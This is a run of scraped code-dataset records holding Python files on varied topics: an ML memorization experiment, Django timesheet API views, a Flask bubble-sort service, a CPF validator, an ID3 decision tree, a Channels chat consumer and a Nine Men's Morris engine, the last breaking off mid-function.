EPOCHS, patience = 5, eval_every = False, eval_loader= None, save_every = None, mask = None)\n #save model\n #make directory\n os.makedirs(filename, exist_ok=True)\n torch.save(model.state_dict(), model_name)\n\n#Load Model\nprint (\"######### Loading Saved Model ###########\")\nsaved_model = get_model(f\"{args['model_type']}\")\nsaved_model.load_state_dict(torch.load(model_name))\ntrain_loader = pre_dict[\"train_loader\"]\n\nprint (f\"Initial accuracy on training set = {eval(saved_model, train_loader, eval_mode = False)['accuracy']}\")\n\n\nnum_examples = 1000\n\n\n# channel_wise = channel, weight\n# objective = \"zero\", \"step\"\nrets = flip_preds(saved_model, \n loader = pre_dict[\"train_loader\"], \n example_type=args[\"example_type\"], \n noise_mask= torch.from_numpy(pre_dict[\"noise_mask\"]), \n rare_mask = torch.from_numpy(pre_dict[\"rare_mask\"]) if pre_dict[\"rare_mask\"] is not None else None, \n eval_post_edit=True, \n num_examples = num_examples, \n verbose = False,\n channel_wise = args[\"channel_wise\"],\n gaussian_noise=args[\"gaussian_noise\"],\n objective = args[\"objective\"],\n n_EoT=args[\"n_EoT\"])\n\n\nimport pickle\n\nwith open(f\"{filename}{args['example_type']}_flips_{args['channel_wise']}_wise_{args['objective']}_gaussian_{args['gaussian_noise']}.pickle\", \"wb\") as output_file:\n pickle.dump(rets, output_file)","repo_name":"pratyushmaini/localizing-memorization","sub_path":"experiments/neuron_flipping/analyze_flipping_difficulty.py","file_name":"analyze_flipping_difficulty.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"69"}
+{"seq_id":"37981655900","text":"# -*- coding: gb18030 -*-\n#\n\n\n\nfrom QuestDart import QuestDart\nimport csstatus\nimport csdefine\n\nclass QuestFamilyDart( QuestDart ):\n\n\n\tdef accept( self, player ):\n\t\t\"\"\"\n\t\tvirtual method.\n\t\t接任务,如果接任务失败了则返回False(例如玩家背包满了放不下任务道具)。\n\n\t\t@param player: instance of Role Entity\n\t\t@type player: Entity\n\t\t@return: BOOL\n\t\t@rtype: BOOL\n\t\t\"\"\"\n\t\t\n\t\tfamilyMB = player.family_getSelfFamilyEntity()\n\t\t\n\t\tif familyMB is None:\n\t\t\tplayer.statusMessage( csstatus.FAMILY_DART_NOT_EXIST )\n\t\t\treturn\n\t\t\n\t\tfamilyMB.queryDartCount( player.base, self.getID() )\n\t\t\n\n\tdef onAccept( self, player, tasks ):\n\t\t\"\"\"\n\t\tvirtual method.\n\t\t执行任务实际处理\n\t\t\"\"\"\n\t\tQuestDart.onAccept( self, player, tasks )\n\n\t\tfamilyMB = player.family_getSelfFamilyEntity()\n\t\t\n\t\tfamilyMB.addDartCount()\n\n","repo_name":"mudsave/csol2_enities_45541","sub_path":"cell/Resource/QuestModule/QuestFamilyDart.py","file_name":"QuestFamilyDart.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24466299612","text":"# Números Favoritos: Modifique o seu programa do Exercício 6.2 para que cada pessoa possa ter mais de um\n# número favorito. Em seguida, apresente o nome de cada pessoa, juntamente com seus números favoritos.\n\nfavorite_number = {\n 'Kesia': {'primeiro número': 2,\n 'segundo número': 7,\n 'terceiro número': 79,},\n 'Roberto': {'primeiro número': 4,\n 'segundo número': 14,\n 'terceiro número': 158,},\n 'Lucio': {'primeiro número': 45,\n 'segundo número': 17,\n 'terceiro número': 56,},\n 'Eliene': {'primeiro número': 60,\n 'segundo número': 88,\n 'terceiro número': 56,},\n 'Renata': {'primeiro número': 88,\n 'segundo número': 79,\n 'terceiro número': 60,}\n}\nfor name, number in favorite_number.items():\n print(f'\\nNome: {name}')\n numero_1 = number['primeiro número']\n numero_2 = number['segundo número']\n numero_3 = number['terceiro número']\n print(f'\\tprimeiro número: {numero_1}')\n print(f'\\tsegundo número: {numero_2}')\n print(f'\\tterceiro número: {numero_3}')","repo_name":"rsmonteiro2021/execicios_python","sub_path":"cap_6/exercicios/6-10.py","file_name":"6-10.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"2279825142","text":"import string\r\n\r\n# cpf.py versao 2.1 20/12/2000\r\n# história:\r\n# 2.1: extraímos calcular_dc da função checar_cpf\r\n# 2.0: não aceita CPFs como 111.111.111-11, 222.222.222-22 etc.\r\n\r\ndef so_digitos(txt):\r\n\t#retorna a string eliminando tudo que não é digito\r\n\tdigitos = []\r\n\tfor car in txt:\r\n\t\tif car in string.digits: digitos.append(car)\r\n\treturn string.join(digitos,'')\r\n\r\ndef calcular_dc(num):\r\n\t#calcula os dígitos de controle a partir de uma string '123456789'\r\n\tmul = 1\r\n\tres = 0\r\n\tfor dig in num:\r\n\t\tres = res+mul*int(dig)\r\n\t\tmul = mul+1\r\n\tdc1 = res % 11\r\n\tif dc1 == 10:\r\n\t\tdc1 = 0\r\n\tmul = 1\r\n\tres = 0\r\n\tfor dig in num[1:]:\r\n\t\tres = res+mul*int(dig)\r\n\t\tmul = mul+1\r\n\tres = res+(9*dc1)\r\n\tdc2 = res % 11\r\n\tif dc2 == 10:\r\n\t\tdc2 = 0\r\n\treturn str(dc1)+str(dc2)\r\n\r\ndef checar_cpf(cpf):\r\n\t'''retorna cpf válido como 000.000.000-00 ou None se for inválido'''\r\n\tcpf = so_digitos(cpf)\r\n\tif len(cpf) != 11:\r\n\t\treturn None\r\n\tif cpf == cpf[0]*11:\r\n\t\t#000.000.000-00, 111.111.111-11 etc. são válidos mas não aceitamos\r\n\t\treturn None\r\n\tnum = cpf[:-2]\r\n\tdc = cpf[-2:]\r\n\tif dc == calcular_dc(num):\r\n\t\treturn '%s.%s.%s-%s' % (num[:3],num[3:6],num[6:9],dc)\r\n\telse:\r\n\t\treturn None\r\n\r\n","repo_name":"ramalho/propython","sub_path":"fundamentos/unittest/cpf.py","file_name":"cpf.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"pt","doc_type":"code","stars":46,"dataset":"github-code","pt":"69"}
+{"seq_id":"19519852221","text":"n, m = list(map(int, input().split()))\na = list(map(int, input().split()))\nb = list(map(int, input().split()))\nx = int(input())\n\nrows = [float('inf')] * (n + 1)\ncols = [float('inf')] * (m + 1)\nfor i in range(n):\n summ = 0\n for j in range(i, n):\n summ += a[j]\n l = j - i + 1\n rows[l] = min(rows[l], summ)\n\nfor i in range(m):\n summ = 0\n for j in range(i, m):\n summ += b[j]\n l = j - i + 1\n cols[l] = min(cols[l], summ)\n\nans = 0\nfor i in range(1, n + 1):\n for j in range(1, m + 1):\n cur = rows[i] * cols[j]\n if cur <= x:\n ans = max(ans, i * j)\nprint(ans)","repo_name":"zhulf0804/Coding.Python","sub_path":"codeforces/1060C_Maximum_Subrectangle.py","file_name":"1060C_Maximum_Subrectangle.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"16614030828","text":"from flask import Flask, request\n\napp = Flask(__name__)\n\n\ndef flat_list(list_to_flat):\n if not isinstance(list_to_flat, list):\n yield list_to_flat\n else:\n for item in list_to_flat:\n yield from flat_list(item)\n\n\n@app.route(\"/\", methods=['POST'])\ndef bubbleSort():\n request_data = request.get_json()\n newSeq = list(flat_list(request_data['arr']))\n newSeq = list(filter(None, newSeq))\n n = len(newSeq)\n print(n)\n\n if n < 10000:\n for i in range(n - 1):\n flag = 0\n\n for j in range(n - 1):\n if newSeq[j] > newSeq[j + 1]:\n tmp = newSeq[j]\n newSeq[j] = newSeq[j + 1]\n newSeq[j + 1] = tmp\n flag = 1\n if flag == 0:\n break\n\n return(','.join(str(x) for x in newSeq))\n else:\n return(\"Array is too big\")\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=5000)\n","repo_name":"Zupirio/Platform-Engineer-Technical-Assignment","sub_path":"TaskB-C/bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72553499420","text":"\"\"\"925r API v2 views.\"\"\"\nimport datetime\nimport dateutil\nfrom django.contrib.auth import models as auth_models\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q, Prefetch\nfrom rest_framework import mixins, permissions, viewsets, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom ninetofiver.api_v2 import serializers, filters\nfrom ninetofiver import models, feeds, calculation, redmine\nfrom ninetofiver.views import BaseTimesheetContractPdfExportServiceAPIView\n\n\nclass MeAPIView(APIView):\n \"\"\"Get the currently authenticated user.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n entity = request.user\n data = serializers.MeSerializer(entity, context={'request': request}).data\n return Response(data)\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve users.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.UserSerializer\n filter_class = filters.UserFilter\n queryset = (auth_models.User.objects\n .exclude(is_active=False)\n .order_by('-date_joined')\n .select_related('userinfo'))\n\n\nclass LeaveTypeViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve leave types.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.LeaveTypeSerializer\n queryset = models.LeaveType.objects.all()\n\n\nclass ContractRoleViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve contract roles.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.ContractRoleSerializer\n queryset = models.ContractRole.objects.all()\n\n\nclass PerformanceTypeViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve performance types.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.PerformanceTypeSerializer\n queryset = models.PerformanceType.objects.all()\n\n\nclass LocationViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve locations.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.LocationSerializer\n queryset = models.Location.objects.all()\n\n\nclass HolidayViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve holidays.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.HolidaySerializer\n filter_class = filters.HolidayFilter\n queryset = models.Holiday.objects.all()\n\n\nclass ContractViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve contracts.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.ContractSerializer\n filter_class = filters.ContractFilter\n queryset = (models.Contract.objects.all()\n .select_related('company', 'customer')\n .prefetch_related(\n Prefetch('performance_types', queryset=(models.PerformanceType.objects\n .non_polymorphic())),\n Prefetch('attachments', queryset=(models.Attachment.objects\n .non_polymorphic())),\n Prefetch('contract_groups', queryset=(models.ContractGroup.objects\n .non_polymorphic())))\n .distinct())\n\n def get_queryset(self):\n return self.queryset.filter(contractuser__user=self.request.user)\n\n\nclass ContractUserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve contract users.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.ContractUserSerializer\n filter_class = filters.ContractUserFilter\n queryset = (models.ContractUser.objects.all()\n .select_related('contract', 'contract__customer', 'contract_role', 'user')\n .distinct())\n\n def get_queryset(self):\n return self.queryset.filter(user=self.request.user)\n\n\nclass TimesheetViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD timesheets.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.TimesheetSerializer\n filter_class = filters.TimesheetFilter\n queryset = models.Timesheet.objects.all()\n\n def get_queryset(self):\n return self.queryset.filter(user=self.request.user)\n\n def perform_destroy(self, instance):\n if instance.status != models.STATUS_ACTIVE:\n raise ValidationError({'status': _('Only active timesheets can be deleted.')})\n return super().perform_destroy(instance)\n\n\nclass LeaveViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD leave.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.LeaveSerializer\n filter_class = filters.LeaveFilter\n queryset = (models.Leave.objects.all()\n .select_related('leave_type')\n .prefetch_related('leavedate_set'))\n\n def get_queryset(self):\n return self.queryset.filter(user=self.request.user)\n\n def perform_destroy(self, instance):\n if instance.status not in [models.STATUS_DRAFT, models.STATUS_PENDING]:\n raise ValidationError({'status': _('Only draft/pending leave can be deleted.')})\n return super().perform_destroy(instance)\n\n\nclass WhereaboutViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD whereabouts.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.WhereaboutSerializer\n filter_class = filters.WhereaboutFilter\n queryset = (models.Whereabout.objects.all()\n .select_related('location'))\n\n def get_queryset(self):\n return self.queryset.filter(timesheet__user=self.request.user)\n\n\nclass PerformanceViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD performance.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.PerformanceSerializer\n filter_class = filters.PerformanceFilter\n queryset = (models.Performance.objects.all()\n .select_related('contract', 'contract__customer'))\n\n def get_queryset(self):\n return self.queryset.filter(timesheet__user=self.request.user)\n\n\nclass AttachmentViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD attachments.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.AttachmentSerializer\n filter_class = filters.AttachmentFilter\n queryset = (models.Attachment.objects.all())\n\n def get_queryset(self):\n return self.queryset.filter(user=self.request.user)\n\n def perform_destroy(self, instance):\n # Don't allow deleting of attachment if the attached leave/timesheet is already closed/approved/rejected\n if (models.Timesheet.objects.filter(~Q(status=models.STATUS_ACTIVE), attachments=instance).count() or\n models.Leave.objects.filter(Q(status=models.STATUS_APPROVED) | Q(status=models.STATUS_REJECTED), attachments=instance)):\n raise ValidationError(_('Attachments linked to finalized timesheets or leaves cannot be deleted.'))\n return super().perform_destroy(instance)\n\n\nclass TimesheetContractPdfDownloadAPIView(BaseTimesheetContractPdfExportServiceAPIView):\n \"\"\"Export a timesheet contract to PDF.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def resolve_user_timesheet_contracts(self, context):\n \"\"\"Resolve the users, timesheets and contracts for this export.\"\"\"\n user = context['view'].request.user\n timesheet = get_object_or_404(models.Timesheet, pk=context.get('timesheet_pk', None), user=user)\n contract = get_object_or_404(models.Contract.objects.distinct(), pk=context.get('contract_pk', None))\n return [[user, timesheet, contract]]\n\n\nclass LeaveFeedAPIView(APIView):\n \"\"\"Leave ICS feed.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n return feeds.LeaveFeed().__call__(request)\n\n\nclass UserLeaveFeedAPIView(APIView):\n \"\"\"User-specific leave ICS feed.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, user_username=None, format=None):\n username = request.parser_context['kwargs'].get('user_username', None)\n user = get_object_or_404(auth_models.User, username=username, is_active=True) if username else request.user\n return feeds.UserLeaveFeed().__call__(request, user=user)\n\n\nclass WhereaboutFeedAPIView(APIView):\n \"\"\"Whereabout ICS feed.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n return feeds.WhereaboutFeed().__call__(request)\n\n\nclass UserWhereaboutFeedAPIView(APIView):\n \"\"\"User-specific whereabout ICS feed.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, user_username=None, format=None):\n username = request.parser_context['kwargs'].get('user_username', None)\n user = get_object_or_404(auth_models.User, username=username, is_active=True) if username else request.user\n return feeds.UserWhereaboutFeed().__call__(request, user=user)\n\n\nclass PerformanceImportAPIView(APIView):\n \"\"\"Gets performances from external sources and returns them to be imported.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n from_date = request.query_params.get('from', str(datetime.date.today()))\n until_date = request.query_params.get('until', str(datetime.date.today()))\n\n data = {\n 'count': 0,\n 'previous': None,\n 'next': None,\n 'results': [],\n }\n\n # Redmine\n redmine_data = redmine.get_user_redmine_performances(request.user, from_date=from_date, to_date=until_date)\n data['results'] += redmine_data\n data['count'] = len(data['results'])\n\n return Response(data)\n\n\nclass RangeAvailabilityAPIView(APIView):\n \"\"\"Get availability for all active users.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n \"\"\"Defines the entrypoint of the retrieval.\"\"\"\n from_date = dateutil.parser.parse(request.query_params.get('from', None)).date()\n until_date = dateutil.parser.parse(request.query_params.get('until', None)).date()\n\n users = auth_models.User.objects.filter(is_active=True)\n users = users if not request.query_params.get('user', None) else \\\n users.filter(id__in=list(map(int, request.query_params.get('user', None).split(','))))\n\n data = calculation.get_availability(users, from_date, until_date, serialize=True)\n\n return Response(data, status=status.HTTP_200_OK)\n\n\nclass RangeInfoAPIView(APIView):\n \"\"\"Calculates and returns information for a given date range.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n \"\"\"Get date range information.\"\"\"\n user = request.user\n\n from_date = dateutil.parser.parse(request.query_params.get('from', None)).date()\n until_date = dateutil.parser.parse(request.query_params.get('until', None)).date()\n daily = request.query_params.get('daily', 'false') == 'true'\n detailed = request.query_params.get('detailed', 'false') == 'true'\n summary = request.query_params.get('summary', 'false') == 'true'\n\n data = calculation.get_range_info([user], from_date, until_date, daily=daily, detailed=detailed,\n summary=summary, serialize=True)\n data = data[user.id]\n\n return Response(data)","repo_name":"kalmanolah/925r","sub_path":"ninetofiver/api_v2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11858,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"69"}
+{"seq_id":"71342546779","text":"import numpy as np\nimport pandas as pd\n\ndef entropy(target_col):\n elements, counts = np.unique(target_col, return_counts=True)\n entropy_val = np.sum([(-counts[i]/np.sum(counts)) * np.log2(counts[i]/np.sum(counts)) for i in range(len(elements))])\n #print(target_col,entropy_val\n print(entropy_val)\n return entropy_val\n\ndef InfoGain(data, split_attribute_name, target_name=\"yes\"):\n total_entropy = entropy(data[target_name])\n vals, counts = np.unique(data[split_attribute_name], return_counts=True)\n weighted_entropy = np.sum([(counts[i]/np.sum(counts)) * entropy(data.where(data[split_attribute_name]==vals[i]).dropna()[target_name]) for i in range(len(vals))])\n information_gain = total_entropy - weighted_entropy\n print(data,\"\\n\",split_attribute_name,target_name,information_gain,\"\\n\")\n return information_gain\n\ndef ID3(data, original_data, features, target_attribute_name=\"Infected\", parent_node_class=None):\n if len(np.unique(data[target_attribute_name])) <= 1:\n return np.unique(data[target_attribute_name])[0]\n elif len(data)==0:\n return np.unique(original_data[target_attribute_name])[np.argmax(np.unique(original_data[target_attribute_name], return_counts=True)[1])]\n elif len(features) == 0:\n return parent_node_class \n else:\n parent_node_class = np.unique(data[target_attribute_name])[np.argmax(np.unique(data[target_attribute_name], return_counts=True)[1])]\n item_values = [InfoGain(data, feature, target_attribute_name) for feature in features]\n best_feature_index = np.argmax(item_values)\n best_feature = features[best_feature_index]\n tree = {best_feature: {}}\n features = [i for i in features if i != best_feature]\n for value in np.unique(data[best_feature]):\n sub_data = data.where(data[best_feature] == value).dropna()\n subtree = ID3(sub_data, data, features, target_attribute_name, parent_node_class)\n tree[best_feature][value] = subtree\n return tree\n\n# Example usage:\ndata = pd.read_csv('CovidDataset.csv') # Replace with your dataset\ntarget_attribute = 'Infected'\nfeatures = list(data.columns)\nfeatures.remove(target_attribute)\ntree = ID3(data, data, features)\nprint(tree)\n","repo_name":"mchinmayarao/ML_Lab","sub_path":"DecisionTree2.py","file_name":"DecisionTree2.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35698389157","text":"from cgitb import text\nimport json\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nimport asyncio\n\nfrom asgiref.sync import async_to_sync\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.user = self.scope[\"user\"]\n print(\"USER\",self.user.username)\n\n if self.user.is_authenticated:\n # accept connection if user is logged in\n await self.accept()\n\n else:\n # don't accept connection if user is not logged in \n await self.close()\n \n\n self.room_name = self.user.username\n self.room_group_name = self.room_name\n print(\"room_name\",self.room_name)\n print(\"room_group_name\",self.room_group_name)\n\n # Join room group\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n\n # await self.accept()\n self.connected = True\n\n await self.send(text_data=json.dumps({\n 'type': 'websocket.accept',\n 'message': str(self.user.username) + '. You are now connected'\n }))\n\n # while self.connected:\n # await asyncio.sleep(2)\n # await self.send(text_data=json.dumps({\n # 'type': 'websocket.accept',\n # 'message': 'You are now connected'\n # }))\n\n async def disconnect(self, close_code):\n # Leave room group\n await self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n\n async def receive(self, text_data):\n\n # print(\"MESSAGE\",text_data)\n # text_data_json = json.loads(text_data)\n message = text_data\n\n\n print(\"MESSAGE\",message)\n\n # Send message to room group\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message\n }\n )\n\n async def chat_message(self, event):\n message = event['message']\n\n # Send message to WebSocket\n await self.send(text_data=json.dumps({\n 'message': message\n }))","repo_name":"Arslaan0124/SentrendR","sub_path":"crawler/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23742555159","text":"from collections import deque\na = input()\nn = int(input())\nq = deque(a)\n\nfor i in range(n):\n plan = input()\n plan = deque(plan)\n for x in plan:\n if x in q:\n if x != q.popleft():\n print(f'#{i + 1} NO')\n break\n else:\n if len(q) == 0:\n print(f'#{i + 1} YES')\n else:\n print(f'#{i + 1} NO')\n","repo_name":"sangjun0412/codingTest_base","sub_path":"Total_Algorithm/교육과정설계.py","file_name":"교육과정설계.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11722381501","text":"#%%\nfrom data import get_x_y\nfrom pathlib import Path\nfrom playlists import spotify_conn #, get_playlists_from_file\nimport numpy as np\nimport json\nfrom sorter import alphanum_key\n# import pickle\nimport pickle5 as pickle\nimport pandas as pd\nfrom tqdm import tqdm\n# from data import get_features\nfrom playlists import cut_songs_modified\n#%%\nfile_dir = Path(__file__).parent\ndata_dir = file_dir / 'data'\nspotify = spotify_conn(file_dir / 'keys.json')\n#%%\nwith open('tracks_df.pkl', 'rb') as handle:\n tracks_df = pickle.load(handle)\n\ntracks_df = tracks_df.drop(['artist_name', 'track_name', 'type', 'id', 'uri', 'track_href', 'analysis_url'], axis = 1)\ndef get_playlists_from_file(path, conn):\n # Open path to json file, load json data\n data = json.load(open(path))\n dataframe_storage = []\n for ind, playlist in enumerate(data['playlists']):\n # reset track_uri_arr\n tracks = []\n # print(\"index is \", ind)\n if playlist[\"tracks\"]:\n for track in playlist[\"tracks\"]:\n tracks.append(tracks_df.loc[track[\"track_uri\"]].tolist())\n dataframe_storage.append(pd.DataFrame(tracks))\n return dataframe_storage\n\n#%%\narray_df = []\nfor file_path in tqdm(sorted(data_dir.glob('mpd.slice.*.json'), key=alphanum_key)):\n # print(\"File:\", file_path)\n file_dfs = get_playlists_from_file(file_path, spotify)\n array_df += file_dfs\n\nwith open('all_data_noNA.pkl', 'wb') as handle:\n pickle.dump(array_df, handle)\nwith open('all_data_noNA.pkl', 'rb') as handle:\n read_array_df = pickle.load(handle)","repo_name":"rbarden3/song_prediction","sub_path":"generate_data_df.py","file_name":"generate_data_df.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"26242095090","text":"from connected import connected, muehlen, offene_muehlen\n\n\n\ndef steintostring(i):\n if i==-1:\n return 'X'\n elif i==1:\n return 'O'\n elif i==0:\n return '-'\n\n\nclass muehle():\n\n\n def __init__(self, steine=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0], phase=1, amzug=1, zuege=0,sieger=0,wert=0):\n self.steine = steine\n self.phase=phase #1: setzen, 2:ziehen\n self.amzug=amzug #1:weiß, -1: schwarz\n self.zuege=zuege\n self.sieger=sieger\n self.wert=wert\n\n\n\n\n def diesemuehlegibtes(self, muehl, amzug):\n if self.steine[muehl[0]]==amzug and self.steine[muehl[1]]==amzug and self.steine[muehl[2]]==amzug:\n return True\n else:\n return False\n\n\n def istteileinermuehle(self, nehmen):\n for muehl in muehlen:\n if self.diesemuehlegibtes(muehl, self.amzug*(-1)) and (nehmen in muehl):\n return True\n else:\n return False\n\n\n def muehlegebaut(self, stein, nehmen):\n for muehl in muehlen:\n if self.diesemuehlegibtes(muehl, self.amzug) and (stein in muehl) and not self.istteileinermuehle(nehmen):\n return True\n return False\n\n\n def toString(self):\n ausdruck=''\n ausdruck+=f'{steintostring(self.steine[1])}--------{steintostring(self.steine[2])}--------{steintostring(self.steine[3])}\\n'\n ausdruck+=f'| | |\\n'\n ausdruck+=f'| | |\\n'\n ausdruck+=f'| {steintostring(self.steine[9])}-----{steintostring(self.steine[10])}-----{steintostring(self.steine[11])} |\\n'\n ausdruck+=f'| | | | |\\n'\n ausdruck+=f'| | | | |\\n'\n ausdruck+=f'| | {steintostring(self.steine[17])}--{steintostring(self.steine[18])}--{steintostring(self.steine[19])} | |\\n'\n ausdruck+=f'| | | | | |\\n'\n ausdruck+=f'| | | | | |\\n'\n ausdruck+=f'{steintostring(self.steine[8])}--{steintostring(self.steine[16])}--{steintostring(self.steine[24])} {steintostring(self.steine[20])}--{steintostring(self.steine[12])}--{steintostring(self.steine[4])}\\n'\n ausdruck+=f'| | | | | |\\n'\n ausdruck+=f'| | | | | |\\n'\n ausdruck+=f'| | {steintostring(self.steine[23])}--{steintostring(self.steine[22])}--{steintostring(self.steine[21])} | |\\n'\n ausdruck+=f'| | | | |\\n'\n ausdruck+=f'| | | | |\\n'\n ausdruck+=f'| {steintostring(self.steine[15])}-----{steintostring(self.steine[14])}-----{steintostring(self.steine[13])} |\\n'\n ausdruck+=f'| | |\\n'\n ausdruck+=f'| | |\\n'\n ausdruck+=f'{steintostring(self.steine[7])}--------{steintostring(self.steine[6])}--------{steintostring(self.steine[5])}\\n'\n ausdruck += f'Phase: {self.phase}, zuege: {self.zuege}, sieger: {self.sieger}, wert: {self.wert} '\n return ausdruck\n\n\n\n def weristsieger(self):\n schwarz=0\n weis=0\n for i in self.steine:\n if i==-1:\n schwarz+=1\n elif i==1:\n weis+=1\n if schwarz <=2:\n return 1\n elif weis <=2:\n return -1\n for con in connected:\n if self.steine[con[0]]==self.amzug and self.steine[con[1]]==0:\n return 0\n if self.steine[con[1]]==0 and self.steine[con[0]]==self.amzug:\n return 0\n return self.amzug*(-1)\n\n\n\n\n\n\n\n def bewertung(self, manuel=False):\n gewicht_stein=5\n gewicht_zue_muehle=3\n gewicht_offene_muehle=4\n wert=0\n if self.phase==2:\n self.sieger=self.weristsieger()\n if self.sieger!=0:\n return 100000000*self.sieger\n for i in self.steine:\n wert+=gewicht_stein*i\n for muehl in muehlen:\n if self.diesemuehlegibtes(muehl, 1):\n wert += gewicht_zue_muehle\n elif self.diesemuehlegibtes(muehl, -1):\n wert -= gewicht_zue_muehle\n if self.phase==1:\n for farbe in [-1,1]:\n for muehl in muehlen:\n if muehl[0]==farbe and muehl[1]==farbe and muehl[2]==0:\n wert += farbe* gewicht_offene_muehle\n if muehl[0]==farbe and muehl[1]==0 and muehl[2]==farbe:\n wert += farbe* gewicht_offene_muehle\n if muehl[0]==0 and muehl[1]==farbe and muehl[2]==farbe:\n wert += farbe* gewicht_offene_muehle\n if self.phase==2:\n for muehl in offene_muehlen:\n if self.offene_muehle_ist_da(muehl, 1):\n wert += gewicht_offene_muehle\n if self.offene_muehle_ist_da(muehl, -1):\n wert -= gewicht_offene_muehle\n return wert\n\n\n def offene_muehle_ist_da(self, muehl, farbe):\n if self.steine[muehl[0]]==farbe and self.steine[muehl[1]]==farbe and self.steine[muehl[2]]==farbe and self.steine[muehl[3]]==0:\n return True\n else:\n return False\n\ndef ziehen(old, von, nach, nehmen, manuel = False):\n neu= muehle(list(old.steine), int(old.phase), float(old.amzug), int(old.zuege),float(old.sieger),float(old.wert))\n if old.steine[von]==old.amzug and old.steine[nach]==0 and ([min(von,nach),max(von,nach)] in connected):\n neu.steine[von]=0\n neu.steine[nach]=float(old.amzug)\n if(neu.muehlegebaut(nach, nehmen)):\n if manuel:\n print(f'{nach} ist Teil einer Mühle, {nehmen} wird entfernt')\n neu.steine[nehmen]=0\n neu.amzug=float(old.amzug*(-1))\n neu.zuege +=1\n neu.wert=float(neu.bewertung(manuel))\n neu.sieger=float(neu.weristsieger())\n return neu\n else:\n if manuel:\n print('Unzulässiger Zug!')\n if not ([min(von,nach),max(von,nach)] in connected):\n print('Felder sind nicht benachbart')\n if not old.steine[nach]==0:\n print('Zielfeld ist nicht leer')\n if not old.steine[von]==old.amzug :\n print('Du hast keinen Stein auf dem Starfeld')\n return False\n\n\n\ndef setzen(old, feld, nehmen, manuel=False):\n neu= muehle(list(old.steine), 